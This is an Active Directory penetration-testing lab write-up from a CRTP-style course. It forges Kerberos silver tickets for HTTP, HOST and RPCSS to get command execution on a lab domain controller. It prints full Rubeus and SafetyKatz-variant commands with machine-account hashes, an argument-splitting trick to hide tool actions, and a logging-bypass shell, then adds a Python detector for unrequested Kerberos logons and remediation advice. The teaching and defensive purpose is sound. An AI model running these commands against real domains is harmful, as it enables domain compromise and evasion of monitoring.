# CRTP Lab 9

## Task 1

Try to get command execution on the domain controller by creating a silver ticket for:

* HTTP
* WMI

Use the NTLM (RC4) or AES key of the dcorp-dc machine account to forge the service ticket and inject it into the current logon session.

Here, we use Rubeus for the HTTP service (the SPN that WinRM authenticates against).

{% code overflow="wrap" %}

```
# %Pwn% holds the string "silver" produced by ArgSplit, so the Rubeus action
# name does not appear literally on the command line.
# /service  SPN the ticket is forged for (HTTP on the DC)
# /rc4      NTLM hash of the dcorp-dc machine account (the key the ticket is encrypted with)
# /sid      domain SID embedded in the PAC
# /ldap     pull the user's group/attribute data from LDAP so the PAC looks consistent
# /ptt      inject the forged ticket into the current logon session
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
```

{% endcode %}

With the ticket imported into the current logon session, we can open a shell on the DC over WinRM (which presents the HTTP service ticket) and execute commands:

```
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
```

Let's also use BetterSafetyKatz (a SafetyKatz variant) for WMI.

WMI over DCOM authenticates to two services on the target, so we need two tickets: one for the HOST SPN and another for RPCSS (the RPC endpoint mapper).

Let's get one for HOST first. `kerberos::golden` with `/target` and `/service` forges a service ticket (silver ticket) rather than a TGT:

{% code overflow="wrap" %}

```
C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

{% endcode %}

Now for RPCSS:

{% code overflow="wrap" %}

```
C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

{% endcode %}

We can now check that both tickets are present in the current session's ticket cache using `klist`:

```
klist
```

We can now run WMI commands on the DC.

```
# Run InviShell (PowerShell without the script-block/module logging hooks)
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Run a WMI command on the DC
PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
```
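A defender-side correlation for the flow above, added here as an example and not part of the lab or any of the tools it uses. A silver ticket is encrypted with the service account's key and is presented straight to the service, so the KDC never sees it: the host that accepts the ticket records a Kerberos network logon (event 4624, logon type 3) while no domain controller records a matching service-ticket request (event 4769) for that user and service account. The event records, field names and timestamps below are constructed to resemble Windows Security-log fields; the function name, the ten-hour window and the join on machine-account name are assumptions of this example.

```python
"""Flag Kerberos network logons that no domain controller issued a service
ticket for, which is the basic signature of a forged (silver) service ticket.

Assumptions of this example (not taken from the lab page):
  * 4769 events from every DC and 4624 events from the monitored hosts are
    available in one list of dicts with the fields used below;
  * the 4769 ServiceName for a host's HOST/HTTP/RPCSS SPNs is the machine
    account (e.g. DCORP-DC$), so it can be joined on the 4624 Computer name.
"""
from datetime import datetime, timedelta

# Constructed sample events, not captured from a real system.
SAMPLE_EVENTS = [
    # Normal flow: the DC issues a ticket for svcadmin to DCORP-ADMINSRV$,
    # then dcorp-adminsrv accepts a Kerberos network logon a few seconds later.
    {"EventID": 4769, "Time": "2024-01-01T09:00:00", "Computer": "dcorp-dc",
     "TargetUserName": "svcadmin@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-ADMINSRV$"},
    {"EventID": 4624, "Time": "2024-01-01T09:00:05", "Computer": "dcorp-adminsrv",
     "TargetUserName": "svcadmin", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos"},
    # Suspicious flow: dcorp-dc accepts a Kerberos network logon as
    # Administrator, but no 4769 for (Administrator, DCORP-DC$) exists in the
    # preceding window on any DC.
    {"EventID": 4624, "Time": "2024-01-01T10:15:00", "Computer": "dcorp-dc",
     "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos"},
    # NTLM logon: not a Kerberos ticket, so outside the scope of this check.
    {"EventID": 4624, "Time": "2024-01-01T10:20:00", "Computer": "dcorp-dc",
     "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "NTLM"},
]


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def find_unrequested_kerberos_logons(events, window=timedelta(hours=10)):
    """Return the 4624 Kerberos network logons for which no DC logged a 4769
    for the same user and the accepting host's machine account within
    `window` before the logon.

    `window` must be at least the maximum service-ticket lifetime (the domain
    default is 10 hours): a client may legitimately reuse a cached ticket for
    that long, and a shorter window would turn every reuse into an alert.
    """
    issued = []
    for e in events:
        if e.get("EventID") == 4769:
            user = e["TargetUserName"].split("@")[0].lower()
            service_host = e["ServiceName"].rstrip("$").lower()
            issued.append((user, service_host, _ts(e["Time"])))

    suspicious = []
    for e in events:
        if (e.get("EventID") != 4624 or e.get("LogonType") != 3
                or e.get("AuthenticationPackageName") != "Kerberos"):
            continue
        user = e["TargetUserName"].lower()
        host = e["Computer"].lower()
        when = _ts(e["Time"])
        covered = any(
            u == user and h == host and when - window <= t <= when
            for u, h, t in issued
        )
        if not covered:
            suspicious.append(e)
    return suspicious


if __name__ == "__main__":
    for hit in find_unrequested_kerberos_logons(SAMPLE_EVENTS):
        print(f"{hit['Time']} {hit['Computer']}: Kerberos logon as "
              f"{hit['TargetUserName']} with no service ticket issued by a DC")
```

On the sample data this reports only the 10:15 Administrator logon on dcorp-dc. Two caveats matter in practice: 4769 auditing ("Audit Kerberos Service Ticket Operations") has to be enabled and collected from every DC, since a ticket issued by any one of them is legitimate; and the 4624 on the accepting host looks entirely normal on its own, because the forged ticket carries a plausible PAC and services running as SYSTEM do not ask the DC to validate it. Because the ticket is only as good as the machine account key it was forged with, resetting that machine account's password (twice, so the previous key is no longer accepted) invalidates every ticket forged from it.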
